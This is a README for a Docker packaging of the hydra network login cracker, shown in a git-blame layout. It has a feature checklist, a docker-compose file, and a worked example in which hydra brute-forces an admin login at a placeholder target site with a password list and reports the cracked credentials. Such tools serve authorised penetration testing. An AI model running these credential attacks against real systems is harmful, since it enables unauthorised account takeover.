dockerfiles/hydra/README.md

59 lines
1.1 KiB
Markdown
Raw Normal View History

2015-07-02 15:35:11 +00:00
hydra
=====
A very fast network logon cracker which support many different services.
2015-07-02 16:06:55 +00:00
- [x] openssl
- [x] idn
- [x] curses
- [x] pcre
- [x] Postgres
2015-07-02 16:15:55 +00:00
- [x] SVN
2015-07-02 16:06:55 +00:00
- [ ] firebird
- [x] MYSQL client
- [ ] AFP
- [ ] NCP
- [ ] SAP/R3
2015-07-02 16:15:55 +00:00
- [x] libssh
2015-07-02 16:06:55 +00:00
- [ ] Oracle
- [ ] GUI req's
2015-07-02 16:15:55 +00:00
- [x] Android specialities
- [x] secure compile option support in gcc
2015-07-02 16:32:11 +00:00
2019-06-09 00:50:43 +00:00
## docker-compose.yml
2015-07-02 16:32:11 +00:00
2019-06-09 00:50:43 +00:00
```yaml
2022-02-15 04:08:08 +00:00
version: "3.8"
services:
hydra:
image: vimagick/hydra
entrypoint: sleep
command: infinity
volumes:
- ./data:/data
working_dir: /data
restart: unless-stopped
2015-07-02 16:32:11 +00:00
```
2019-06-09 00:50:43 +00:00
# up and running
```bash
$ docker-compose up -d
$ docker-compose exec hydra bash
2015-07-02 16:32:11 +00:00
>>> cat passwd.txt
123456
admin
...
>>> hydra -l admin -P passwd.txt -o hacked.txt http://www.target.com/login.php
[DATA] max 1 task per 1 server, overall 64 tasks, 3 login try (l:1/p:1), ~0 tries per task
[DATA] attacking service http-get on port 2812
2022-02-15 04:08:08 +00:00
[2812][http-get] host: www.target.com login: admin password: admin
2015-07-02 16:32:11 +00:00
1 of 1 target successfully completed, 1 valid password found
>>> cat hacked.txt
2022-02-15 04:08:08 +00:00
[2812][http-get] host: www.target.com login: admin password: admin
2015-07-02 16:32:11 +00:00
```